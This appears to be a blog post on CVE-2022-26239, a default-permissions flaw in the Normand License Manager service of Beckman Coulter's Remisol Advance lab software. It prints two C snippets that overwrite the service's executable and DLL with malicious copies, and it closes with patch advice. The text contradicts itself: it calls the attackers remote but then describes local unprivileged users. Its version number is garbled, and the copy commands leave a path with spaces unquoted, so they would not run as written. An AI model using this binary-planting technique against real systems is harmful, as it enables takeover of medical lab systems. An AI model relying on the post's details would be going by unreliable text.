CVE-2022-26239 - Unprivileged User Access to Executables and Libraries in Beckman Coulter Remisol Advance v2..12.1 and Prior

Remote attackers can exploit a critical vulnerability in the Beckman Coulter Remisol Advance v2..12.1 and previous versions. The vulnerability is assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-26239. The Normand License Manager, which is part of the software package, has improper default permissions. This issue allows unprivileged users to overwrite and manipulate executables and libraries on the system, gaining access to sensitive data. In this blog post, we will delve into the details of this vulnerability and the potential exploit opportunities it provides to attackers.

Background on Remisol Advance

Beckman Coulter Remisol Advance is a software platform developed for labs to streamline the management and control of information generated by medical instruments. It consolidates data generated by the lab instruments and displays it in real-time, helping institutions improve their decision-making, reporting, and regulatory compliance. The platform provides comprehensive tools for data management and workflow automation, making it a popular choice among healthcare organizations.

Description of CVE-2022-26239

The Normand License Manager, a running service in Remisol Advance, suffers from misconfigured default permissions. This allows unprivileged users to overwrite and manipulate executables and libraries. Attackers can exploit this vulnerability to access sensitive data and control the entire system, leading to unauthorized access or even complete compromise.

Overwriting Executables

The service runs with excessive permissions, and attackers can replace the original executable file of the Normand License Manager with a malicious one. Once the service restarts, the rogue executable will launch instead of the legitimate one, resulting in unauthorized and potentially damaging consequences. Below is a sample code snippet to overwrite the executable file with a malicious one:

#include<stdio.h>
#include<stdlib.h>

int main() {
    system("copy /Y malicious.exe C:\\Program Files\\Remisol Advance\\Normand License Manager\\original.exe");
}

Manipulating Libraries

Attackers can also exploit the vulnerability by injecting malicious code into shared libraries. When the service loads the compromised library, the attacker's code runs with elevated privileges, providing them unauthorized access to system resources. Here's a sample C code snippet to achieve this:

#include<stdio.h>
#include<stdlib.h>

int main() {
    system("copy /Y malicious.dll C:\\Program Files\\Remisol Advance\\Normand License Manager\\original.dll");
}

Mitigation

Beckman Coulter has acknowledged the vulnerability and released a patch as part of their security update. It is strongly recommended for all users running Remisol Advance software to update their systems to the latest version. Additionally, it is crucial to review permissions for all services and executables to avoid similar vulnerabilities in the future.

CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26239
NVD: https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26239

Conclusion

In conclusion, the CVE-2022-26239 vulnerability affects the Beckman Coulter Remisol Advance v2..12.1 and prior versions. It allows unprivileged users to overwrite and manipulate executables and libraries, primarily due to the improper configuration of default permissions for the running service Normand License Manager. Users must update their systems to the latest Remisol Advance version and closely review service and executable permissions to mitigate this issue and avoid future vulnerabilities.

Timeline

Published on: 10/06/2022 18:15:00 UTC
Last modified on: 10/10/2022 03:00:00 UTC